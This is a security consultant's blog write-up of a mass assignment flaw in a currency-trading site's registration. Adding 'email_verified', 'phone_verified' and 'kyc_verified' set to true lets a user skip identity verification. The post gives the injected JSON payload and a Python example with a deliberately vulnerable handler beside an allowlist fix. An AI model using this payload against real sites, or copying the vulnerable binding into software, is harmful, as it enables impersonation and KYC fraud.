Assalamu alaikum (peace be upon you), long time no see… In my latest post, I shared how I chained an IDOR with an Account Takeover. If you haven't read it yet, go ahead and take a look!
I would love to connect with you on LinkedIn; if you haven't already, send me a request!
I will keep it short, with loads of info…
whoami - I am a Security Consultant who is always in search of imperfections in applications.
Mass Assignment: in simple words, this vulnerability lets us add extra parameters to a POST request and change data that the user is not supposed to change, because the server copies every submitted field onto its object instead of accepting only an allowlist. Example: during registration we add "role":"administrator".
So… let's begin.
Let's say there is a website freepalestine.free (I cannot disclose the real website name). The app verifies a user's identity and only then allows them to buy and sell currency.
Steps to reproduce the bug:
We registered a user; its JSON data looked like this:
{
  "name": "test",
  "phone_no": "1234",
  "passwd": "4321",
  "confirm_passwd": "4321"
}
I saw a request to /userinfo triggered just after registration. It fetches the user's data using their cookie, and its response contains info about the user:
{
  "name": "test",
  "phone_no": "1234",
  blahh..,
  blahh....,
  "email_verified": "false",
  "phone_verified": "false",
  "kyc_verified": "false"
}
Then I thought of something, and thought: why not…
I registered a user again, but this time I added some additional parameters with their values set to true…
{
  "name": "hacker",
  "phone_no": "1234",
  "passwd": "43211234",
  "confirm_passwd": "43211234",
  "email_verified": "true",
  "phone_verified": "true",
  "kyc_verified": "true"
}
and BAAAAMM!!!!! got 200 OK
Again, just after registration, /userinfo was triggered, and its response was something like:
{
  "name": "hacker",
  "phone_no": "1234",
  blah..,
  blahh...,
  "email_verified": "true",
  "phone_verified": "true",
  "kyc_verified": "true"
}
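To make the mass-assignment definition above and the registration steps concrete, here is a constructed Python example written for this post; it is not the assessed application's code. The field names (name, phone_no, passwd, email_verified, phone_verified, kyc_verified) follow the write-up, while the handler logic, the server defaults, the allowlist and all function names are assumptions. It shows a vulnerable registration handler that copies every JSON key onto the user record, the same handler hardened with an allowlist that rejects unknown keys, and the /userinfo view that exposes the difference.

```python
"""Mass assignment at registration: vulnerable binding beside an allowlist fix.

Constructed example written for this post; it is not the assessed
application's code. The field names follow the write-up, while the handler
logic, defaults and function names are assumptions.
"""
from __future__ import annotations

import hashlib
from typing import Any

# Server-owned state for a brand-new account. These flags may only become
# true via the e-mail / SMS / KYC verification flows, never via client input.
SERVER_DEFAULTS: dict[str, Any] = {
    "email_verified": False,
    "phone_verified": False,
    "kyc_verified": False,
}

# Allowlist: the only keys a client may send to the registration endpoint.
CLIENT_WRITABLE = frozenset({"name", "phone_no", "passwd", "confirm_passwd"})

# What the /userinfo endpoint echoes back (mirrors the write-up's response).
USERINFO_FIELDS = ("name", "phone_no", "email_verified", "phone_verified", "kyc_verified")


class RegistrationError(ValueError):
    """Payload rejected; a real handler would map this to HTTP 400."""


def _hash_password(payload: dict[str, Any]) -> str:
    if payload.get("passwd") != payload.get("confirm_passwd"):
        raise RegistrationError("passwd and confirm_passwd do not match")
    # Placeholder hashing for the demo; use a real KDF (argon2/bcrypt) in production.
    return hashlib.sha256(str(payload["passwd"]).encode()).hexdigest()


def _finish(user: dict[str, Any], pw_hash: str) -> dict[str, Any]:
    """Strip the plaintext password fields and store the hash instead."""
    user.pop("passwd", None)
    user.pop("confirm_passwd", None)
    user["passwd_hash"] = pw_hash
    return user


def register_vulnerable(payload: dict[str, Any]) -> dict[str, Any]:
    """Vulnerable handler: binds every JSON key straight onto the user record.

    Extra keys such as "kyc_verified": "true" overwrite the server defaults,
    which is exactly the behaviour observed in the write-up.
    """
    pw_hash = _hash_password(payload)
    user = dict(SERVER_DEFAULTS)
    user.update(payload)  # the bug: untrusted keys win over server defaults
    return _finish(user, pw_hash)


def unexpected_fields(payload: dict[str, Any]) -> set[str]:
    """Keys outside the allowlist. Worth logging: a benign client never sends them."""
    return set(payload) - CLIENT_WRITABLE


def register_hardened(payload: dict[str, Any]) -> dict[str, Any]:
    """Hardened handler: rejects unknown keys and copies only allowlisted ones."""
    extra = unexpected_fields(payload)
    if extra:
        raise RegistrationError(f"unexpected field(s): {sorted(extra)}")
    pw_hash = _hash_password(payload)
    user = dict(SERVER_DEFAULTS)
    user.update({k: payload[k] for k in CLIENT_WRITABLE if k in payload})
    return _finish(user, pw_hash)


def userinfo(user: dict[str, Any]) -> dict[str, Any]:
    """Response of the /userinfo call that fires right after registration."""
    return {k: user[k] for k in USERINFO_FIELDS if k in user}


# Constructed payloads modelled on the two registrations in the post.
NORMAL_PAYLOAD = {"name": "test", "phone_no": "1234",
                  "passwd": "4321", "confirm_passwd": "4321"}
INJECTED_PAYLOAD = {"name": "hacker", "phone_no": "1234",
                    "passwd": "43211234", "confirm_passwd": "43211234",
                    "email_verified": "true", "phone_verified": "true",
                    "kyc_verified": "true"}

if __name__ == "__main__":
    print("vulnerable :", userinfo(register_vulnerable(INJECTED_PAYLOAD)))
    try:
        register_hardened(INJECTED_PAYLOAD)
    except RegistrationError as exc:
        print("hardened   : rejected ->", exc)
    print("hardened ok:", userinfo(register_hardened(NORMAL_PAYLOAD)))
```

The hardened handler rejects the request rather than silently dropping the extra keys, so the attempt shows up as a 400 in the access logs; unexpected_fields() is the piece a defender would wire into logging or alerting, since a legitimate client never sends verification flags to the registration endpoint.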
I was like…
IMPACT:
- As an attacker, I can register with anyone's email and phone number and get them marked as verified without ever going through verification.
- Then, I can act as someone with a verified profile.
- I was able to access all the functionality that is normally available to a user only after completing the whole verification process.
It could have been a $$$ bounty, but unfortunately it was an assignment, so I got appreciation.
In the end, I hope this helped you with some info, even if it was a small one.
Thank you.